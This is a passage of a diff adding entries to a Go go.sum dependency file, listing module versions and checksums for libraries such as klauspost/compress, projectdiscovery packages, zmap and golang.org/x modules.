+github.com/klauspost/compress v1.11.4/go.mod h1:aoV0uJVorq1K+umq18yTdKaF57EivdYsUV+/s2qKfXs=
+github.com/klauspost/compress v1.16.7 h1:2mk3MPGNzKyxErAw8YaohYh69+pa4sIQSC0fPGCFR9I=
+github.com/klauspost/compress v1.16.7/go.mod h1:ntbaceVETuRiXiv4DpjP66DpAtAGkEQskQzEyD//IeE=
+github.com/klauspost/cpuid v1.2.0/go.mod h1:Pj4uuM528wm8OyEC2QMXAi2YiTZ96dNQPGgoMS4s3ek=
+github.com/klauspost/pgzip v1.2.5 h1:qnWYvvKqedOF2ulHpMG72XQol4ILEJ8k2wwRl/Km8oE=
+github.com/klauspost/pgzip v1.2.5/go.mod h1:Ch1tH69qFZu15pkjo5kYi6mth2Zzwzt50oCQKQE9RUs=
+github.com/konsorten/go-windows-terminal-sequences v1.0.1/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ=
+github.com/kr/pretty v0.1.0 h1:L/CwN0zerZDmRFUapSPitk6f+Q3+0za1rQkzVuMiMFI=
+github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo=
+github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ=
+github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI=
+github.com/kr/text v0.2.0 h1:5Nx0Ya0ZqY2ygV366QzturHI13Jq95ApcVaJBhpS+AY=
+github.com/kr/text v0.2.0/go.mod h1:eLer722TekiGuMkidMxC/pM04lWEeraHUUmBw8l2grE=
+github.com/logrusorgru/aurora v2.0.3+incompatible h1:tOpm7WcpBTn4fjmVfgpQq0EfczGlG91VSDkswnjF5A8=
+github.com/logrusorgru/aurora v2.0.3+incompatible/go.mod h1:7rIyQOR62GCctdiQpZ/zOJlFyk6y+94wXzv6RNZgaR4=
+github.com/mattn/go-colorable v0.1.13 h1:fFA4WZxdEF4tXPZVKMLwD8oUnCTTo08duU7wxecdEvA=
+github.com/mattn/go-colorable v0.1.13/go.mod h1:7S9/ev0klgBDR4GtXTXX8a3vIGJpMovkB8vQcUbaXHg=
+github.com/mattn/go-isatty v0.0.16/go.mod h1:kYGgaQfpe5nmfYZH+SKPsOc2e4SrIfOl2e/yFXSvRLM=
+github.com/mattn/go-isatty v0.0.19 h1:JITubQf0MOLdlGRuRq+jtsDlekdYPia9ZFsB8h/APPA=
+github.com/mattn/go-isatty v0.0.19/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y=
+github.com/mholt/archiver/v3 v3.5.1 h1:rDjOBX9JSF5BvoJGvjqK479aL70qh9DIpZCl+k7Clwo=
+github.com/mholt/archiver/v3 v3.5.1/go.mod h1:e3dqJ7H78uzsRSEACH1joayhuSyhnonssnDhppzS1L4=
+github.com/microcosm-cc/bluemonday v1.0.25 h1:4NEwSfiJ+Wva0VxN5B8OwMicaJvD8r9tlJWm9rtloEg=
+github.com/microcosm-cc/bluemonday v1.0.25/go.mod h1:ZIOjCQp1OrzBBPIJmfX4qDYFuhU02nx4bn030ixfHLE=
+github.com/miekg/dns v1.1.56 h1:5imZaSeoRNvpM9SzWNhEcP9QliKiz20/dA2QabIGVnE=
+github.com/miekg/dns v1.1.56/go.mod h1:cRm6Oo2C8TY9ZS/TqsSrseAcncm74lfK5G+ikN2SWWY=
+github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q=
+github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd h1:TRLaZ9cD/w8PVh93nsPXa1VrQ6jlwL5oN8l14QlcNfg=
+github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q=
+github.com/modern-go/reflect2 v1.0.2 h1:xBagoLtFs94CBntxluKeaWgTMpvLxC4ur3nMaC9Gz0M=
+github.com/modern-go/reflect2 v1.0.2/go.mod h1:yWuevngMOJpCy52FWWMvUC8ws7m/LJsjYzDa0/r8luk=
+github.com/mreiferson/go-httpclient v0.0.0-20160630210159-31f0106b4474/go.mod h1:OQA4XLvDbMgS8P0CevmM4m9Q3Jq4phKUzcocxuGJ5m8=
+github.com/mreiferson/go-httpclient v0.0.0-20201222173833-5e475fde3a4d/go.mod h1:OQA4XLvDbMgS8P0CevmM4m9Q3Jq4phKUzcocxuGJ5m8=
+github.com/nwaples/rardecode v1.1.0/go.mod h1:5DzqNKiOdpKKBH87u8VlvAnPZMXcGRhxWkRpHbbfGS0=
+github.com/nwaples/rardecode v1.1.3 h1:cWCaZwfM5H7nAD6PyEdcVnczzV8i/JtotnyW/dD9lEc=
+github.com/nwaples/rardecode v1.1.3/go.mod h1:5DzqNKiOdpKKBH87u8VlvAnPZMXcGRhxWkRpHbbfGS0=
+github.com/nxadm/tail v1.4.11 h1:8feyoE3OzPrcshW5/MJ4sGESc5cqmGkGCWlco4l0bqY=
+github.com/nxadm/tail v1.4.11/go.mod h1:OTaG3NK980DZzxbRq6lEuzgU+mug70nY11sMd4JXXHc=
+github.com/onsi/ginkgo v1.6.0/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE=
+github.com/onsi/ginkgo v1.7.0/go.mod h1:lLunBs/Ym6LB5Z9jYTR76FiuTmxDTDusOGeTQH+WWjE=
+github.com/onsi/ginkgo v1.16.4 h1:29JGrr5oVBm5ulCWet69zQkzWipVXIol6ygQUe/EzNc=
+github.com/onsi/ginkgo v1.16.4/go.mod h1:dX+/inL/fNMqNlz0e9LfyB9TswhZpCVdJM/Z6Vvnwo0=
+github.com/onsi/ginkgo/v2 v2.9.5 h1:+6Hr4uxzP4XIUyAkg61dWBw8lb/gc4/X5luuxN/EC+Q=
+github.com/onsi/ginkgo/v2 v2.9.5/go.mod h1:tvAoo1QUJwNEU2ITftXTpR7R1RbCzoZUOs3RonqW57k=
+github.com/onsi/gomega v1.4.3/go.mod h1:ex+gbHU/CVuBBDIJjb2X0qEXbFg53c61hWP/1CpauHY=
+github.com/onsi/gomega v1.27.6 h1:ENqfyGeS5AX/rlXDd/ETokDz93u0YufY1Pgxuy/PvWE=
+github.com/onsi/gomega v1.27.6/go.mod h1:PIQNjfQwkP3aQAH7lf7j87O/5FiNr+ZR8+ipb+qQlhg=
+github.com/op/go-logging v0.0.0-20160315200505-970db520ece7/go.mod h1:HzydrMdWErDVzsI23lYNej1Htcns9BCg93Dk0bBINWk=
+github.com/pierrec/lz4/v4 v4.1.2 h1:qvY3YFXRQE/XB8MlLzJH7mSzBs74eA2gg52YTk6jUPM=
+github.com/pierrec/lz4/v4 v4.1.2/go.mod h1:gZWDp/Ze/IJXGXf23ltt2EXimqmTUXEy0GFuRQyBid4=
+github.com/pkg/errors v0.9.1 h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4=
+github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=
+github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
+github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
+github.com/projectdiscovery/blackrock v0.0.1 h1:lHQqhaaEFjgf5WkuItbpeCZv2DUIE45k0VbGJyft6LQ=
+github.com/projectdiscovery/blackrock v0.0.1/go.mod h1:ANUtjDfaVrqB453bzToU+YB4cUbvBRpLvEwoWIwlTss=
+github.com/projectdiscovery/fastdialer v0.0.50 h1:NJyuiSMi0Fy78+qSVhqRs83NtKyM91dJ5x778kshiOQ=
+github.com/projectdiscovery/fastdialer v0.0.50/go.mod h1:y8X6at1FyRwmSig6+amuRXnxViDRGGK7S2EAvxf7mDo=
+github.com/projectdiscovery/goflags v0.1.36 h1:gElwVU9BJsUbxjyHqDTmlGsB8Br2DDxbfMQMXLYvYhg=
+github.com/projectdiscovery/goflags v0.1.36/go.mod h1:A+MLWJgGKZ2WUED0ZlW5EQ4mmJ/s71VnvY6KF5ThLaM=
+github.com/projectdiscovery/gologger v1.1.12 h1:uX/QkQdip4PubJjjG0+uk5DtyAi1ANPJUvpmimXqv4A=
+github.com/projectdiscovery/gologger v1.1.12/go.mod h1:DI8nywPLERS5mo8QEA9E7gd5HZ3Je14SjJBH3F5/kLw=
+github.com/projectdiscovery/hmap v0.0.33 h1:kDkw4xVE8uyko6Cv3Cd9MZsHByn9BtXK3y7PeLKVBs4=
+github.com/projectdiscovery/hmap v0.0.33/go.mod h1:IlKSbnFKtn68STLiNwc5Kbu4GaR6aIsGaHbpFOYNFGY=
+github.com/projectdiscovery/networkpolicy v0.0.6 h1:yDvm0XCrS9HeemRrBS+J+22surzVczM94W5nHiOy/1o=
+github.com/projectdiscovery/networkpolicy v0.0.6/go.mod h1:8HJQ/33Pi7v3a3MRWIQGXzpj+zHw2d60TysEL4qdoQk=
+github.com/projectdiscovery/ratelimit v0.0.25 h1:CTt2/bbxfj7IrUelubra1g2OQBanaefyGfPYHQ+5q5A=
+github.com/projectdiscovery/ratelimit v0.0.25/go.mod h1:rZ1ZT0EN2hAk1OWFH0wgWhfYJssyWPV9VtOabXgCmwc=
+github.com/projectdiscovery/retryabledns v1.0.48 h1:7m4aB5IK3P6UKkA4abBxerJYApzP4yraXj4Ju8kZ9zU=
+github.com/projectdiscovery/retryabledns v1.0.48/go.mod h1:XvdWQjIaohj9HTS+5ZxL6fRCoOP4JpB6w78eiXXDia4=
+github.com/projectdiscovery/retryablehttp-go v1.0.42 h1:NW76U/r0pWNi6iudBqggG69sN8aguuXLLbGRkLvniyo=
+github.com/projectdiscovery/retryablehttp-go v1.0.42/go.mod h1:NWR4amTNHwM+ALk1QL1HiyzhFejRTMCHapM+oSoNSv8=
+github.com/projectdiscovery/utils v0.0.73 h1:KWzxzJv9U5YKHGGOvkKHJmO7NdV5Kbzc8lPt+Frdj0o=
+github.com/projectdiscovery/utils v0.0.73/go.mod h1:SEb3ZoGy1nxdnPNXAGhMZNhRcokRkoMEjC6l9H59t1s=
+github.com/quic-go/quic-go v0.37.7 h1:AgKsQLZ1+YCwZd2GYhBUsJDYZwEkA5gENtAjb+MxONU=
+github.com/quic-go/quic-go v0.37.7/go.mod h1:YsbH1r4mSHPJcLF4k4zruUkLBqctEMBDR6VPvcYjIsU=
+github.com/refraction-networking/utls v1.5.4 h1:9k6EO2b8TaOGsQ7Pl7p9w6PUhx18/ZCeT0WNTZ7Uw4o=
+github.com/refraction-networking/utls v1.5.4/go.mod h1:SPuDbBmgLGp8s+HLNc83FuavwZCFoMmExj+ltUHiHUw=
+github.com/remeh/sizedwaitgroup v1.0.0 h1:VNGGFwNo/R5+MJBf6yrsr110p0m4/OX4S3DCy7Kyl5E=
+github.com/remeh/sizedwaitgroup v1.0.0/go.mod h1:3j2R4OIe/SeS6YDhICBy22RWjJC5eNCJ1V+9+NVNYlo=
+github.com/saintfish/chardet v0.0.0-20230101081208-5e3ef4b5456d h1:hrujxIzL1woJ7AwssoOcM/tq5JjjG2yYOc8odClEiXA=
+github.com/saintfish/chardet v0.0.0-20230101081208-5e3ef4b5456d/go.mod h1:uugorj2VCxiV1x+LzaIdVa9b4S4qGAcH6cbhh4qVxOU=
+github.com/sirupsen/logrus v1.3.0/go.mod h1:LxeOpSwHxABJmUn/MG1IvRgCAasNZTLOkJPxbbu5VWo=
+github.com/sirupsen/logrus v1.7.0/go.mod h1:yWOB1SBYBC5VeMP7gHvWumXLIWorT60ONWic61uBYv0=
+github.com/sirupsen/logrus v1.9.0/go.mod h1:naHLuLoDiP4jHNo9R0sCBMtWGeIprob74mVsIT4qYEQ=
+github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
+github.com/stretchr/objx v0.1.1/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
+github.com/stretchr/testify v1.2.2/go.mod h1:a8OnRcib4nhh0OaRAV+Yts87kKdq0PP7pXfy6kDkUVs=
+github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI=
+github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4=
+github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
+github.com/stretchr/testify v1.8.4 h1:CcVxjf3Q8PM0mHUKJCdn+eZZtm5yQwehR5yeSVQQcUk=
+github.com/stretchr/testify v1.8.4/go.mod h1:sz/lmYIOXD/1dqDmKjjqLyZ2RngseejIcXlSw2iwfAo=
+github.com/syndtr/goleveldb v1.0.0 h1:fBdIW9lB4Iz0n9khmH8w27SJ3QEJ7+IgjPEwGSZiFdE=
+github.com/syndtr/goleveldb v1.0.0/go.mod h1:ZVVdQEZoIme9iO1Ch2Jdy24qqXrMMOU6lpPAyBWyWuQ=
+github.com/tidwall/assert v0.1.0 h1:aWcKyRBUAdLoVebxo95N7+YZVTFF/ASTr7BN4sLP6XI=
+github.com/tidwall/assert v0.1.0/go.mod h1:QLYtGyeqse53vuELQheYl9dngGCJQ+mTtlxcktb+Kj8=
+github.com/tidwall/btree v1.4.3 h1:Lf5U/66bk0ftNppOBjVoy/AIPBrLMkheBp4NnSNiYOo=
+github.com/tidwall/btree v1.4.3/go.mod h1:LGm8L/DZjPLmeWGjv5kFrY8dL4uVhMmzmmLYmsObdKE=
+github.com/tidwall/buntdb v1.3.0 h1:gdhWO+/YwoB2qZMeAU9JcWWsHSYU3OvcieYgFRS0zwA=
+github.com/tidwall/buntdb v1.3.0/go.mod h1:lZZrZUWzlyDJKlLQ6DKAy53LnG7m5kHyrEHvvcDmBpU=
+github.com/tidwall/gjson v1.12.1/go.mod h1:/wbyibRr2FHMks5tjHJ5F8dMZh3AcwJEMf5vlfC0lxk=
+github.com/tidwall/gjson v1.14.3 h1:9jvXn7olKEHU1S9vwoMGliaT8jq1vJ7IH/n9zD9Dnlw=
+github.com/tidwall/gjson v1.14.3/go.mod h1:/wbyibRr2FHMks5tjHJ5F8dMZh3AcwJEMf5vlfC0lxk=
+github.com/tidwall/grect v0.1.4 h1:dA3oIgNgWdSspFzn1kS4S/RDpZFLrIxAZOdJKjYapOg=
+github.com/tidwall/grect v0.1.4/go.mod h1:9FBsaYRaR0Tcy4UwefBX/UDcDcDy9V5jUcxHzv2jd5Q=
+github.com/tidwall/lotsa v1.0.2 h1:dNVBH5MErdaQ/xd9s769R31/n2dXavsQ0Yf4TMEHHw8=
+github.com/tidwall/lotsa v1.0.2/go.mod h1:X6NiU+4yHA3fE3Puvpnn1XMDrFZrE9JO2/w+UMuqgR8=
+github.com/tidwall/match v1.1.1 h1:+Ho715JplO36QYgwN9PGYNhgZvoUSc9X2c80KVTi+GA=
+github.com/tidwall/match v1.1.1/go.mod h1:eRSPERbgtNPcGhD8UCthc6PmLEQXEWd3PRB5JTxsfmM=
+github.com/tidwall/pretty v1.2.0 h1:RWIZEg2iJ8/g6fDDYzMpobmaoGh5OLl4AXtGUGPcqCs=
+github.com/tidwall/pretty v1.2.0/go.mod h1:ITEVvHYasfjBbM0u2Pg8T2nJnzm8xPwvNhhsoaGGjNU=
+github.com/tidwall/rtred v0.1.2 h1:exmoQtOLvDoO8ud++6LwVsAMTu0KPzLTUrMln8u1yu8=
+github.com/tidwall/rtred v0.1.2/go.mod h1:hd69WNXQ5RP9vHd7dqekAz+RIdtfBogmglkZSRxCHFQ=
+github.com/tidwall/tinyqueue v0.1.1 h1:SpNEvEggbpyN5DIReaJ2/1ndroY8iyEGxPYxoSaymYE=
+github.com/tidwall/tinyqueue v0.1.1/go.mod h1:O/QNHwrnjqr6IHItYrzoHAKYhBkLI67Q096fQP5zMYw=
+github.com/ulikunitz/xz v0.5.8/go.mod h1:nbz6k7qbPmH4IRqmfOplQw/tblSgqTqBwxkY0oWt/14=
+github.com/ulikunitz/xz v0.5.9/go.mod h1:nbz6k7qbPmH4IRqmfOplQw/tblSgqTqBwxkY0oWt/14=
+github.com/ulikunitz/xz v0.5.11 h1:kpFauv27b6ynzBNT/Xy+1k+fK4WswhN/6PN5WhFAGw8=
+github.com/ulikunitz/xz v0.5.11/go.mod h1:nbz6k7qbPmH4IRqmfOplQw/tblSgqTqBwxkY0oWt/14=
+github.com/ulule/deepcopier v0.0.0-20200430083143-45decc6639b6 h1:TtyC78WMafNW8QFfv3TeP3yWNDG+uxNkk9vOrnDu6JA=
+github.com/ulule/deepcopier v0.0.0-20200430083143-45decc6639b6/go.mod h1:h8272+G2omSmi30fBXiZDMkmHuOgonplfKIKjQWzlfs=
+github.com/weppos/publicsuffix-go v0.13.0/go.mod h1:z3LCPQ38eedDQSwmsSRW4Y7t2L8Ln16JPQ02lHAdn5k=
+github.com/weppos/publicsuffix-go v0.30.1-0.20230422193905-8fecedd899db h1:/WcxBne+5CbtbgWd/sV2wbravmr4sT7y52ifQaCgoLs=
+github.com/weppos/publicsuffix-go v0.30.1-0.20230422193905-8fecedd899db/go.mod h1:aiQaH1XpzIfgrJq3S1iw7w+3EDbRP7mF5fmwUhWyRUs=
+github.com/xi2/xz v0.0.0-20171230120015-48954b6210f8 h1:nIPpBwaJSVYIxUFsDv3M8ofmx9yWTog9BfvIu0q41lo=
+github.com/xi2/xz v0.0.0-20171230120015-48954b6210f8/go.mod h1:HUYIGzjTL3rfEspMxjDjgmT5uz5wzYJKVo23qUhYTos=
+github.com/yl2chen/cidranger v1.0.2 h1:lbOWZVCG1tCRX4u24kuM1Tb4nHqWkDxwLdoS+SevawU=
+github.com/yl2chen/cidranger v1.0.2/go.mod h1:9U1yz7WPYDwf0vpNWFaeRh0bjwz5RVgRy/9UEQfHl0g=
+github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY=
+github.com/zmap/rc2 v0.0.0-20131011165748-24b9757f5521/go.mod h1:3YZ9o3WnatTIZhuOtot4IcUfzoKVjUHqu6WALIyI0nE=
+github.com/zmap/rc2 v0.0.0-20190804163417-abaa70531248 h1:Nzukz5fNOBIHOsnP+6I79kPx3QhLv8nBy2mfFhBRq30=
+github.com/zmap/rc2 v0.0.0-20190804163417-abaa70531248/go.mod h1:3YZ9o3WnatTIZhuOtot4IcUfzoKVjUHqu6WALIyI0nE=
+github.com/zmap/zcertificate v0.0.0-20180516150559-0e3d58b1bac4/go.mod h1:5iU54tB79AMBcySS0R2XIyZBAVmeHranShAFELYx7is=
+github.com/zmap/zcertificate v0.0.1/go.mod h1:q0dlN54Jm4NVSSuzisusQY0hqDWvu92C+TWveAxiVWk=
+github.com/zmap/zcrypto v0.0.0-20201128221613-3719af1573cf/go.mod h1:aPM7r+JOkfL+9qSB4KbYjtoEzJqUK50EXkkJabeNJDQ=
+github.com/zmap/zcrypto v0.0.0-20201211161100-e54a5822fb7e/go.mod h1:aPM7r+JOkfL+9qSB4KbYjtoEzJqUK50EXkkJabeNJDQ=
+github.com/zmap/zcrypto v0.0.0-20230422215203-9a665e1e9968 h1:YOQ1vXEwE4Rnj+uQ/3oCuJk5wgVsvUyW+glsndwYuyA=
+github.com/zmap/zcrypto v0.0.0-20230422215203-9a665e1e9968/go.mod h1:xIuOvYCZX21S5Z9bK1BMrertTGX/F8hgAPw7ERJRNS0=
+github.com/zmap/zlint/v3 v3.0.0/go.mod h1:paGwFySdHIBEMJ61YjoqT4h7Ge+fdYG4sUQhnTb1lJ8=
+go.etcd.io/bbolt v1.3.7 h1:j+zJOnnEjF/kyHlDDgGnVL/AIqIJPq8UoB2GSNfkUfQ=
+go.etcd.io/bbolt v1.3.7/go.mod h1:N9Mkw9X8x5fupy0IKsmuqVtoGDyxsaDlbk4Rd05IAQw=
+go.uber.org/multierr v1.11.0 h1:blXXJkSxSSfBVBlC76pxqeO+LN3aDfLQo+309xJstO0=
+go.uber.org/multierr v1.11.0/go.mod h1:20+QtiLqy0Nd6FdQB9TLXag12DsQkrbs3htMFfDN80Y=
+golang.org/x/crypto v0.0.0-20180904163835-0709b304e793/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4=
+golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
+golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
+golang.org/x/crypto v0.0.0-20201124201722-c8d3bf9c5392/go.mod h1:jdWPYTVW3xRLrWPugEBEK3UY2ZEsg3UU495nc5E+M+I=
+golang.org/x/crypto v0.0.0-20201208171446-5f87f3452ae9/go.mod h1:jdWPYTVW3xRLrWPugEBEK3UY2ZEsg3UU495nc5E+M+I=
+golang.org/x/crypto v0.0.0-20210817164053-32db794688a5/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc=
+golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc=
+golang.org/x/crypto v0.6.0/go.mod h1:OFC/31mSvZgRz0V1QTNCzfAI1aIRzbiufJtkMIlEp58=
+golang.org/x/crypto v0.7.0/go.mod h1:pYwdfH91IfpZVANVyUOhSIPZaFoJGxTFbZhFTx+dXZU=
+golang.org/x/crypto v0.17.0 h1:r8bRNjWL3GshPW3gkd+RpvzWrZAwPS49OmTGZ/uhM4k=
+golang.org/x/crypto v0.17.0/go.mod h1:gCAAfMLgwOJRpTjQ2zCCt2OcSfYMTeZVSRtQlPC7Nq4=
+golang.org/x/exp v0.0.0-20221205204356-47842c84f3db h1:D/cFflL63o2KSLJIwjlcIt8PR064j/xsmdEJL/YvY/o=
+golang.org/x/exp v0.0.0-20221205204356-47842c84f3db/go.mod h1:CxIveKay+FTh1D0yPZemJVgC/95VzuuOLq5Qi4xnoYc=
+golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4=
+golang.org/x/mod v0.8.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs=
+golang.org/x/mod v0.12.0 h1:rmsUpXtvNzj340zd98LZ4KntptpfRHwpFOHG188oHXc=
+golang.org/x/mod v0.12.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs=
+golang.org/x/net v0.0.0-20180906233101-161cd47e91fd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
+golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
+golang.org/x/net v0.0.0-20190603091049-60506f45cf65/go.mod h1:HSz+uSET+XFnRR8LxR5pz3Of3rY3CfYBVs4xY44aLks=
+golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
+golang.org/x/net v0.0.0-20201110031124-69a78807bb2b/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
+golang.org/x/net v0.0.0-20201209123823-ac852fbbde11/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
+golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
+golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c=
+golang.org/x/net v0.6.0/go.mod h1:2Tu9+aMcznHK/AK1HMvgo6xiTLG5rD5rZLDS+rp2Bjs=
+golang.org/x/net v0.8.0/go.mod h1:QVkue5JL9kW//ek3r6jTKnTFis1tRmNAW2P1shuFdJc=
+golang.org/x/net v0.17.0 h1:pVaXccu2ozPjCXewfr1S7xza/zcXTity9cCdXQYSjIM=
+golang.org/x/net v0.17.0/go.mod h1:NxSsAGuq816PNPmqtQdLE42eU2Fs7NoRIZrHJAlaCOE=
+golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U=
+golang.org/x/oauth2 v0.5.0/go.mod h1:9/XBHVqLaWO3/BRHs5jbpYCnOZVjj5V0ndyaAM7KB4I=
+golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
+golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
+golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
+golang.org/x/sync v0.1.0/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
+golang.org/x/sync v0.3.0 h1:ftCYgMx6zT/asHUrPw8BLLscYtGznsLAnjq5RH9P66E=
+golang.org/x/sync v0.3.0/go.mod h1:FU7BRWz2tNW+3quACPkgCx/L+uEAv1htQ0V83Z9Rj+Y=
+golang.org/x/sys v0.0.0-20180905080454-ebe1bf3edb33/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
+golang.org/x/sys v0.0.0-20180909124046-d0be0721c37e/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
+golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
+golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20201126233918-771906719818/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/sys v0.0.0-20220722155257-8c9f86f7a55f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/sys v0.0.0-20220811171246-fbc7d0a398ab/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/sys v0.5.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/sys v0.16.0 h1:xWw16ngr6ZMtmxDyKyIgsE93KNKz5HKmMa3b8ALHidU=
+golang.org/x/sys v0.16.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA=
+golang.org/x/term v0.0.0-20201117132131-f5c789dd3221/go.mod h1:Nr5EML6q2oocZ2LXRh80K7BxOlk5/8JxuGnuhpl+muw=
+golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
+golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8=
+golang.org/x/term v0.5.0/go.mod h1:jMB1sMXY+tzblOD4FWmEbocvup2/aLOaQEp7JmGp78k=
+golang.org/x/term v0.6.0/go.mod h1:m6U89DPEgQRMq3DNkDClhWw02AUbt2daBVO4cn4Hv9U=
+golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
+golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk=
